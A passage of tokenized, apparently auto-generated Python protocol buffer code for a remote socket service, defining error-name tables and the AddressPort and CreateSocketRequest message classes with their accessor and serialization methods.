<NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT:20> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT:30> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT:32> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT:50> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" 
, <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT:64> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT:100> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> 
<NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> } <EOL> def SystemError_Name ( cls , x ) : return cls . _SystemError_NAMES . get ( x , "<STR_LIT>" ) <EOL> SystemError_Name = classmethod ( SystemError_Name ) <EOL> has_system_error_ = <NUM_LIT:0> <EOL> system_error_ = <NUM_LIT:0> <EOL> has_error_detail_ = <NUM_LIT:0> <EOL> error_detail_ = "<STR_LIT>" <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def system_error ( self ) : return self . system_error_ <EOL> def set_system_error ( self , x ) : <EOL> self . has_system_error_ = <NUM_LIT:1> <EOL> self . system_error_ = x <EOL> def clear_system_error ( self ) : <EOL> if self . has_system_error_ : <EOL> self . has_system_error_ = <NUM_LIT:0> <EOL> self . system_error_ = <NUM_LIT:0> <EOL> def has_system_error ( self ) : return self . has_system_error_ <EOL> def error_detail ( self ) : return self . error_detail_ <EOL> def set_error_detail ( self , x ) : <EOL> self . has_error_detail_ = <NUM_LIT:1> <EOL> self . error_detail_ = x <EOL> def clear_error_detail ( self ) : <EOL> if self . has_error_detail_ : <EOL> self . has_error_detail_ = <NUM_LIT:0> <EOL> self . error_detail_ = "<STR_LIT>" <EOL> def has_error_detail ( self ) : return self . has_error_detail_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_system_error ( ) ) : self . set_system_error ( x . 
system_error ( ) ) <EOL> if ( x . has_error_detail ( ) ) : self . set_error_detail ( x . error_detail ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_system_error_ != x . has_system_error_ : return <NUM_LIT:0> <EOL> if self . has_system_error_ and self . system_error_ != x . system_error_ : return <NUM_LIT:0> <EOL> if self . has_error_detail_ != x . has_error_detail_ : return <NUM_LIT:0> <EOL> if self . has_error_detail_ and self . error_detail_ != x . error_detail_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_system_error_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . system_error_ ) <EOL> if ( self . has_error_detail_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . error_detail_ ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_system_error_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . system_error_ ) <EOL> if ( self . has_error_detail_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . error_detail_ ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_system_error ( ) <EOL> self . clear_error_detail ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> if ( self . has_system_error_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . system_error_ ) <EOL> if ( self . has_error_detail_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . error_detail_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_system_error_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . system_error_ ) <EOL> if ( self . has_error_detail_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . 
error_detail_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:8> : <EOL> self . set_system_error ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_error_detail ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_system_error_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . system_error_ ) ) <EOL> if self . has_error_detail_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . error_detail_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ksystem_error = <NUM_LIT:1> <EOL> kerror_detail = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class AddressPort ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_port_ = <NUM_LIT:0> <EOL> port_ = <NUM_LIT:0> <EOL> has_packed_address_ = <NUM_LIT:0> <EOL> packed_address_ = "<STR_LIT>" <EOL> has_hostname_hint_ = <NUM_LIT:0> <EOL> hostname_hint_ = "<STR_LIT>" <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . 
MergeFromString ( contents ) <EOL> def port ( self ) : return self . port_ <EOL> def set_port ( self , x ) : <EOL> self . has_port_ = <NUM_LIT:1> <EOL> self . port_ = x <EOL> def clear_port ( self ) : <EOL> if self . has_port_ : <EOL> self . has_port_ = <NUM_LIT:0> <EOL> self . port_ = <NUM_LIT:0> <EOL> def has_port ( self ) : return self . has_port_ <EOL> def packed_address ( self ) : return self . packed_address_ <EOL> def set_packed_address ( self , x ) : <EOL> self . has_packed_address_ = <NUM_LIT:1> <EOL> self . packed_address_ = x <EOL> def clear_packed_address ( self ) : <EOL> if self . has_packed_address_ : <EOL> self . has_packed_address_ = <NUM_LIT:0> <EOL> self . packed_address_ = "<STR_LIT>" <EOL> def has_packed_address ( self ) : return self . has_packed_address_ <EOL> def hostname_hint ( self ) : return self . hostname_hint_ <EOL> def set_hostname_hint ( self , x ) : <EOL> self . has_hostname_hint_ = <NUM_LIT:1> <EOL> self . hostname_hint_ = x <EOL> def clear_hostname_hint ( self ) : <EOL> if self . has_hostname_hint_ : <EOL> self . has_hostname_hint_ = <NUM_LIT:0> <EOL> self . hostname_hint_ = "<STR_LIT>" <EOL> def has_hostname_hint ( self ) : return self . has_hostname_hint_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_port ( ) ) : self . set_port ( x . port ( ) ) <EOL> if ( x . has_packed_address ( ) ) : self . set_packed_address ( x . packed_address ( ) ) <EOL> if ( x . has_hostname_hint ( ) ) : self . set_hostname_hint ( x . hostname_hint ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_port_ != x . has_port_ : return <NUM_LIT:0> <EOL> if self . has_port_ and self . port_ != x . port_ : return <NUM_LIT:0> <EOL> if self . has_packed_address_ != x . has_packed_address_ : return <NUM_LIT:0> <EOL> if self . has_packed_address_ and self . packed_address_ != x . packed_address_ : return <NUM_LIT:0> <EOL> if self . has_hostname_hint_ != x . 
has_hostname_hint_ : return <NUM_LIT:0> <EOL> if self . has_hostname_hint_ and self . hostname_hint_ != x . hostname_hint_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_port_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthVarInt64 ( self . port_ ) <EOL> if ( self . has_packed_address_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . packed_address_ ) ) <EOL> if ( self . has_hostname_hint_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . hostname_hint_ ) ) <EOL> return n + <NUM_LIT:1> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_port_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . port_ ) <EOL> if ( self . has_packed_address_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . packed_address_ ) ) <EOL> if ( self . has_hostname_hint_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . hostname_hint_ ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_port ( ) <EOL> self . clear_packed_address ( ) <EOL> self . clear_hostname_hint ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . port_ ) <EOL> if ( self . has_packed_address_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . packed_address_ ) <EOL> if ( self . has_hostname_hint_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . hostname_hint_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_port_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . port_ ) <EOL> if ( self . has_packed_address_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . 
packed_address_ ) <EOL> if ( self . has_hostname_hint_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . hostname_hint_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:8> : <EOL> self . set_port ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_packed_address ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_hostname_hint ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_port_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . port_ ) ) <EOL> if self . has_packed_address_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . packed_address_ ) ) <EOL> if self . has_hostname_hint_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . hostname_hint_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kport = <NUM_LIT:1> <EOL> kpacked_address = <NUM_LIT:2> <EOL> khostname_hint = <NUM_LIT:3> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT:port>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> } , <NUM_LIT:3> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:3> , ProtocolBuffer . Encoder . 
MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class CreateSocketRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> IPv4 = <NUM_LIT:1> <EOL> IPv6 = <NUM_LIT:2> <EOL> _SocketFamily_NAMES = { <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } <EOL> def SocketFamily_Name ( cls , x ) : return cls . _SocketFamily_NAMES . get ( x , "<STR_LIT>" ) <EOL> SocketFamily_Name = classmethod ( SocketFamily_Name ) <EOL> TCP = <NUM_LIT:1> <EOL> UDP = <NUM_LIT:2> <EOL> _SocketProtocol_NAMES = { <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } <EOL> def SocketProtocol_Name ( cls , x ) : return cls . _SocketProtocol_NAMES . get ( x , "<STR_LIT>" ) <EOL> SocketProtocol_Name = classmethod ( SocketProtocol_Name ) <EOL> has_family_ = <NUM_LIT:0> <EOL> family_ = <NUM_LIT:0> <EOL> has_protocol_ = <NUM_LIT:0> <EOL> protocol_ = <NUM_LIT:0> <EOL> has_proxy_external_ip_ = <NUM_LIT:0> <EOL> proxy_external_ip_ = None <EOL> has_listen_backlog_ = <NUM_LIT:0> <EOL> listen_backlog_ = <NUM_LIT:0> <EOL> has_remote_ip_ = <NUM_LIT:0> <EOL> remote_ip_ = None <EOL> has_app_id_ = <NUM_LIT:0> <EOL> app_id_ = "<STR_LIT>" <EOL> def __init__ ( self , contents = None ) : <EOL> self . socket_options_ = [ ] <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def family ( self ) : return self . family_ <EOL> def set_family ( self , x ) : <EOL> self . has_family_ = <NUM_LIT:1> <EOL> self . family_ = x <EOL> def clear_family ( self ) : <EOL> if self . has_family_ : <EOL> self . has_family_ = <NUM_LIT:0> <EOL> self . family_ = <NUM_LIT:0> <EOL> def has_family ( self ) : return self . has_family_ <EOL> def protocol ( self ) : return self . protocol_ <EOL> def set_protocol ( self , x ) : <EOL> self . has_protocol_ = <NUM_LIT:1> <EOL> self . 
protocol_ = x <EOL> def clear_protocol ( self ) : <EOL> if self . has_protocol_ : <EOL> self . has_protocol_ = <NUM_LIT:0> <EOL> self . protocol_ = <NUM_LIT:0> <EOL> def has_protocol ( self ) : return self . has_protocol_ <EOL> def socket_options_size ( self ) : return len ( self . socket_options_ ) <EOL> def socket_options_list ( self ) : return self . socket_options_ <EOL> def socket_options ( self , i ) : <EOL> return self . socket_options_ [ i ] <EOL> def mutable_socket_options ( self , i ) : <EOL> return self . socket_options_ [ i ] <EOL> def add_socket_options ( self ) : <EOL> x = SocketOption ( ) <EOL> self . socket_options_ . append ( x ) <EOL> return x <EOL> def clear_socket_options ( self ) : <EOL> self . socket_options_ = [ ] <EOL> def proxy_external_ip ( self ) : <EOL> if self . proxy_external_ip_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . proxy_external_ip_ is None : self . proxy_external_ip_ = AddressPort ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . proxy_external_ip_ <EOL> def mutable_proxy_external_ip ( self ) : self . has_proxy_external_ip_ = <NUM_LIT:1> ; return self . proxy_external_ip ( ) <EOL> def clear_proxy_external_ip ( self ) : <EOL> if self . has_proxy_external_ip_ : <EOL> self . has_proxy_external_ip_ = <NUM_LIT:0> ; <EOL> if self . proxy_external_ip_ is not None : self . proxy_external_ip_ . Clear ( ) <EOL> def has_proxy_external_ip ( self ) : return self . has_proxy_external_ip_ <EOL> def listen_backlog ( self ) : return self . listen_backlog_ <EOL> def set_listen_backlog ( self , x ) : <EOL> self . has_listen_backlog_ = <NUM_LIT:1> <EOL> self . listen_backlog_ = x <EOL> def clear_listen_backlog ( self ) : <EOL> if self . has_listen_backlog_ : <EOL> self . has_listen_backlog_ = <NUM_LIT:0> <EOL> self . listen_backlog_ = <NUM_LIT:0> <EOL> def has_listen_backlog ( self ) : return self . has_listen_backlog_ <EOL> def remote_ip ( self ) : <EOL> if self . 
remote_ip_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . remote_ip_ is None : self . remote_ip_ = AddressPort ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . remote_ip_ <EOL> def mutable_remote_ip ( self ) : self . has_remote_ip_ = <NUM_LIT:1> ; return self . remote_ip ( ) <EOL> def clear_remote_ip ( self ) : <EOL> if self . has_remote_ip_ : <EOL> self . has_remote_ip_ = <NUM_LIT:0> ; <EOL> if self . remote_ip_ is not None : self . remote_ip_ . Clear ( ) <EOL> def has_remote_ip ( self ) : return self . has_remote_ip_ <EOL> def app_id ( self ) : return self . app_id_ <EOL> def set_app_id ( self , x ) : <EOL> self . has_app_id_ = <NUM_LIT:1> <EOL> self . app_id_ = x <EOL> def clear_app_id ( self ) : <EOL> if self . has_app_id_ : <EOL> self . has_app_id_ = <NUM_LIT:0> <EOL> self . app_id_ = "<STR_LIT>" <EOL> def has_app_id ( self ) : return self . has_app_id_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_family ( ) ) : self . set_family ( x . family ( ) ) <EOL> if ( x . has_protocol ( ) ) : self . set_protocol ( x . protocol ( ) ) <EOL> for i in xrange ( x . socket_options_size ( ) ) : self . add_socket_options ( ) . CopyFrom ( x . socket_options ( i ) ) <EOL> if ( x . has_proxy_external_ip ( ) ) : self . mutable_proxy_external_ip ( ) . MergeFrom ( x . proxy_external_ip ( ) ) <EOL> if ( x . has_listen_backlog ( ) ) : self . set_listen_backlog ( x . listen_backlog ( ) ) <EOL> if ( x . has_remote_ip ( ) ) : self . mutable_remote_ip ( ) . MergeFrom ( x . remote_ip ( ) ) <EOL> if ( x . has_app_id ( ) ) : self . set_app_id ( x . app_id ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_family_ != x . has_family_ : return <NUM_LIT:0> <EOL> if self . has_family_ and self . family_ != x . family_ : return <NUM_LIT:0> <EOL> if self . has_protocol_ != x . has_protocol_ : return <NUM_LIT:0> <EOL> if self . 
has_protocol_ and self . protocol_ != x . protocol_ : return <NUM_LIT:0> <EOL> if len ( self . socket_options_ ) != len ( x . socket_options_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . socket_options_ , x . socket_options_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> if self . has_proxy_external_ip_ != x . has_proxy_external_ip_ : return <NUM_LIT:0> <EOL> if self . has_proxy_external_ip_ and self . proxy_external_ip_ != x . proxy_external_ip_ : return <NUM_LIT:0> <EOL> if self . has_listen_backlog_ != x . has_listen_backlog_ : return <NUM_LIT:0> <EOL> if self . has_listen_backlog_ and self . listen_backlog_ != x . listen_backlog_ : return <NUM_LIT:0> <EOL> if self . has_remote_ip_ != x . has_remote_ip_ : return <NUM_LIT:0> <EOL> if self . has_remote_ip_ and self . remote_ip_ != x . remote_ip_ : return <NUM_LIT:0> <EOL> if self . has_app_id_ != x . has_app_id_ : return <NUM_LIT:0> <EOL> if self . has_app_id_ and self . app_id_ != x . app_id_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_family_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_protocol_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> for p in self . socket_options_ : <EOL> if not p . IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> if ( self . has_proxy_external_ip_ and not self . proxy_external_ip_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> if ( self . has_remote_ip_ and not self . remote_ip_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthVarInt64 ( self . family_ ) <EOL> n += self . lengthVarInt64 ( self . protocol_ ) <EOL> n += <NUM_LIT:1> * len ( self . 
socket_options_ ) <EOL> for i in xrange ( len ( self . socket_options_ ) ) : n += self . lengthString ( self . socket_options_ [ i ] . ByteSize ( ) ) <EOL> if ( self . has_proxy_external_ip_ ) : n += <NUM_LIT:1> + self . lengthString ( self . proxy_external_ip_ . ByteSize ( ) ) <EOL> if ( self . has_listen_backlog_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . listen_backlog_ ) <EOL> if ( self . has_remote_ip_ ) : n += <NUM_LIT:1> + self . lengthString ( self . remote_ip_ . ByteSize ( ) ) <EOL> if ( self . has_app_id_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . app_id_ ) ) <EOL> return n + <NUM_LIT:2> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_family_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . family_ ) <EOL> if ( self . has_protocol_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . protocol_ ) <EOL> n += <NUM_LIT:1> * len ( self . socket_options_ ) <EOL> for i in xrange ( len ( self . socket_options_ ) ) : n += self . lengthString ( self . socket_options_ [ i ] . ByteSizePartial ( ) ) <EOL> if ( self . has_proxy_external_ip_ ) : n += <NUM_LIT:1> + self . lengthString ( self . proxy_external_ip_ . ByteSizePartial ( ) ) <EOL> if ( self . has_listen_backlog_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . listen_backlog_ ) <EOL> if ( self . has_remote_ip_ ) : n += <NUM_LIT:1> + self . lengthString ( self . remote_ip_ . ByteSizePartial ( ) ) <EOL> if ( self . has_app_id_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . app_id_ ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_family ( ) <EOL> self . clear_protocol ( ) <EOL> self . clear_socket_options ( ) <EOL> self . clear_proxy_external_ip ( ) <EOL> self . clear_listen_backlog ( ) <EOL> self . clear_remote_ip ( ) <EOL> self . clear_app_id ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . family_ ) <EOL> out . 
